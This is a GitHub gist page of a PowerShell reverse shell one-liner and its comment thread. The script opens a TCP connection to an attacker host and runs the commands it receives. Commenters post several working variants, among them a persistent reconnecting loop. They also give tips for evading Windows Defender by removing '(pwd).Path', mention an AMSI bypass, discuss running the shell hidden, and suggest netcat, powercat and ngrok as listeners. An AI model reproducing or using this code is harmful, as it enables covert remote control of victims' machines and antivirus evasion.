powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok

powershell_reverse_shell.ps1

# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Script Is running now but it gives detection error
@egre55, What were you telling to replace? to evade defender? Can u do the changes in the code?

One way or the other this script can be a disaster this is the best way i run such script::::::::::::: make sure you add the powershell -nop -c followed:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Which listener can be used for this? NetCat?

yep, or Powercat: https://github.com/besimorhino/powercat

It got detected as MaliciousContent, Anything else? Should I try Obfuscation?

After executing it in PowerShell with IP and port changed but it is showing....... "new object exception calling ctor with 2 argument s connection attempt failed " what to do because I am not a PowerShell expert.
I run the netcat server in the Virtualbox

windows 10 has powershell script disabled for security defence.

…

On Tue, Nov 10, 2020 at 7:02 AM XZE3N ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------ hey, i wonder if i could get any help. I started playing around with this and it works amazing on win 7 but when I try to run it on a win 10 machine i get this error. I'm not sure if you can get around this. I'm using windows defender on this machine. [image: Screenshot (116)] <https://user-images.githubusercontent.com/63551886/98640855-764d1700-2333-11eb-8add-b469513bba0f.png> — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3522306>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYLKJ5SKTG64UZ642QLSPDQRVANCNFSM4IKBLS6A> .

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

Hi, Kindly check my fork.

Just a small change to the way commands are run to ensure any non-stdout text is sent back. (except for confirmation prompts).

Without this, due to the way in which the output of a command run by Invoke-Expression is handled, stderr output never gets sent back even with '2>&1' specified in your current format.

Thanks,

[vry nice )

i tried to run it silently by -WindowsStyle Hidden -NoLog but it not working , how can i run it silently

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

Hi, can someone explain how this exactly works? Why is (pwd).Path triggers the antivirus. And is this reverse shell only available until a restart of the victim's pc? I didn't found any explanation online. Thanks in advance.

good job!
It detected AMSI. but I used amsi bypass script before this script running.so this script runs successfully!

Looks like the shell did not return stderr, is it possible to return stderr as well?

hey @mappl3, feel free to add this in your fork and i'll update it ;) . you can also append 2>&1 to the end of a command to get stderr

Got stderr working with this modification:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
And if you want to catch some errors:
$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);try { $sendback = (iex ". { $data } 2>&1" | Out-String ); } catch { $sendback = "$_`n"}; $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

that's the one-liner updated with your addition for stderr. thanks for your contribution @Veids!

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

How would I run this from a bat file and what book do you recommend to learn powershell scripting on this level

Thanks for all your works! I have a question , how can i use this ps1 whit ngrok? If i change ip and port doesnt work on nc -nlvp 4444 (port i forward whit ngrok )

Thanks for all your works! I have a question , how can i use this ps1 whit ngrok? If i change ip and port doesnt work on nc -nlvp 4444 (port i forward whit ngrok )

In order to connect via port 4444, port 4444 has to also be open on your target. Try a different port like 53

while($true){try{$c=New-Object System.Net.Sockets.TCPClient("your server",8880);$s=$c.GetStream();$nl=[Environment]::NewLine;$m=[System.Text.Encoding]::UTF8.GetBytes('asprsh'+$nl+'{"a":"a"}'+$nl);$s.Write($m,0,$m.Length);$s.Flush();[byte[]]$b=0..65535|%{0};while($true){if(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$ec=@("exit", "quit", "bye", "logout", "close");if($d -in $ec) {continue;} else { $g=(iex $d 2>&1 | Out-String );$w=$g+$nl+"PS "+(pwd).Path+"# ";$p=([text.encoding]::ASCII).GetBytes($w);$s.Write($p,0,$p.Length);$s.Flush()}};$c.Close();}catch{Start-Sleep -Seconds 2};};